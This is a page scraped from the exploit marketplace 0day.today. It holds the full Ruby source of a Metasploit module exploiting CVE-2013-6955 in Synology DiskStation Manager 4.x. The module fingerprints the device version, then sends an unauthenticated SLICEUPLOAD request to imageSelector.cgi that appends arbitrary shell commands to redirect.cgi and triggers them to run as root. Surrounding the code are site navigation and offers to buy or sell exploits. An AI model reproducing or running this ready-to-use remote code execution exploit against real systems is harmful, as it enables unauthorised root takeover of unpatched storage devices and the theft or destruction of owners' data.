0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Synology DiskStation Manager SLICEUPLOAD Remote Command Execution
Author
Risk
[Security Risk Critical
]0day-ID
Category
Date add
CVE
Platform
##
## This module requires Metasploit: http//metasploit.com/download
## Current source: https://github.com/rapid7/metasploit-framework
###
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
DEVICE_INFO_PATTERN = /major=(?<major>\d+)&minor=(?<minor>\d+)&build=(?<build>\d+)
&junior=\d+&unique=synology_\w+_(?<model>[^&]+)/x
def initialize(info={})
super(update_info(info,
'Name' => "Synology DiskStation Manager SLICEUPLOAD Remote Command Execution",
'Description' => %q{
This module exploits a vulnerability found in Synology DiskStation Manager (DSM)
versions 4.x, which allows the execution of arbitrary commands under root
privileges.
The vulnerability is located in /webman/imageSelector.cgi, which allows to append
arbitrary data to a given file using a so called SLICEUPLOAD functionality, which
can be triggered by an unauthenticated user with a specially crafted HTTP request.
This is exploited by this module to append the given commands to /redirect.cgi,
which is a regular shell script file, and can be invoked with another HTTP request.
Synology reported that the vulnerability has been fixed with versions 4.0-2259,
4.2-3243, and 4.3-3810 Update 1, respectively; the 4.1 branch remains vulnerable.
},
'Author' =>
[
'Markus Wulftange' # Discovery, Metasploit module
],
'References' =>
[
[ 'CVE', '2013-6955' ],
],
'Privileged' => false,
'Platform' => ['unix'],
'Arch' => ARCH_CMD,
'Payload' =>
{
'DisableNops' => true,
'Space' => 0x31337,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl telnet',
}
},
'Targets' =>
[
['Automatic', {}]
],
'DefaultTarget' => 0,
'License' => MSF_LICENSE,
'DisclosureDate' => 'Oct 31 2013'
))
register_options(
[
Opt::RPORT(5000)
], self.class)
end
def check
print_status("#{peer} - Trying to detect installed version")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri('webman', 'info.cgi'),
'vars_get' => { 'host' => ''}
})
if res and res.code == 200 and res.body =~ DEVICE_INFO_PATTERN
version = "#{$~[:major]}.#{$~[:minor]}"
build = $~[:build]
model = $~[:model].sub(/^[a-z]+/) { |s| s[0].upcase }
model = "DS#{model}" unless model =~ /^[A-Z]/
else
print_status("#{peer} - Detection failed")
return Exploit::CheckCode::Unknown
end
print_status("#{peer} - Model #{model} with version #{version}-#{build} detected")
case version
when '4.0'
return Exploit::CheckCode::Vulnerable if build < '2259'
when '4.1'
return Exploit::CheckCode::Vulnerable
when '4.2'
return Exploit::CheckCode::Vulnerable if build < '3243'
when '4.3'
return Exploit::CheckCode::Vulnerable if build < '3810'
return Exploit::CheckCode::Detected if build == '3810'
end
Exploit::CheckCode::Safe
end
def exploit
cmds = [
# sed is used to restore the redirect.cgi
"sed -i -e '/sed -i -e/,$d' /usr/syno/synoman/redirect.cgi",
payload.encoded
].join("\n")
mime_msg = Rex::MIME::Message.new
mime_msg.add_part('login', nil, nil, 'form-data; name="source"')
mime_msg.add_part('logo', nil, nil, 'form-data; name="type"')
# unfortunately, Rex::MIME::Message canonicalizes line breaks to \r\n,
# so we use a placeholder and replace it later
cmd_placeholder = Rex::Text::rand_text_alphanumeric(10)
mime_msg.add_part(cmd_placeholder, 'application/octet-stream', nil,
'form-data; name="foo"; filename="bar"')
post_body = mime_msg.to_s
post_body.strip!
post_body.sub!(cmd_placeholder, cmds)
# fix multipart encoding
post_body.gsub!(/\r\n(--#{mime_msg.bound})/, ' \\1')
# send request to append shell commands
print_status("#{peer} - Injecting the payload...")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri('webman', 'imageSelector.cgi'),
'ctype' => "multipart/form-data; boundary=#{mime_msg.bound}",
'headers' => {
'X-TYPE-NAME' => 'SLICEUPLOAD',
'X-TMP-FILE' => '/usr/syno/synoman/redirect.cgi'
},
'data' => post_body
})
unless res and res.code == 200 and res.body.include?('error_noprivilege')
fail_with(Failure::Unknown, "#{peer} - Unexpected response, probably the exploit failed")
end
# send request to invoke the injected shell commands
print_status("#{peer} - Executing the payload...")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri('redirect.cgi'),
})
# Read command output if cmd/unix/generic payload was used
if datastore['CMD']
unless res and res.code == 200
fail_with(Failure::Unknown, "#{peer} - Unexpected response, probably the exploit failed")
end
print_good("#{peer} - Command successfully executed")
print_line(res.body)
end
end
end
# 0day.today [2024-11-16] #